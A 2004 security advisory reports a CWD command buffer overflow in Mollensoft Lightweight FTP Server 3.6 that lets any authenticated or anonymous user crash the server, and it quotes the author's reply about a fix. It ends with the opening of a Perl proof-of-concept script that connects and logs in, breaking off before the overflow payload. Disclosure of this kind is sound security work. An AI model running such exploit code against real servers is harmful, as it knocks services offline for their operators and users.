Mollensoft Lightweight FTP Server CWD Buffer Overflow
24 May. 2004
STORM has discovered a security vulnerability in Mollensoft Lightweight FTP Server. Mollensoft Lightweight FTP Server's support for the CWD command incorrectly verifies that the buffer the CWD command doesn't overflow any of its internal buffers. This insufficient verification allows an authenticated (anonymous or otherwise) user to cause the FTP server to crash while trying to read an arbitrary memory location by issuing a malformed CWD command.
SecurITeam would like to thank STORM for finding this vulnerability.
* Mollensoft Lightweight FTP Server version 3.6
BigAl (author) responded with: I wrote this particular app with Visual Basic and used an FTP ActiveX COM component and I am waiting for the component creator to get back to me regarding the fix. Unfortunately I cannot snip off any of the commands, as access to the command length is not available from the VB component using straight VB Code. I am working on moving to .Net so hopefully I can have a new FTP server out by fall time frame which is truly multi-threaded and totally coded by me.
# Mollensoft FTP Server CMD Buffer Overflow
# Orkut users? Come join the SecuriTeam community
usage() unless (@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
# receive greeting
my $repcode = "220 ";
my $response = recv_reply($socket, $repcode);
# send USER command
#my $username = "%00" x 2041;
my $username = "anonymous";
print "USER $username\r\n";
print $socket "USER $username\r\n";
select(undef, undef, undef, 0.002); # sleep of 2 milliseconds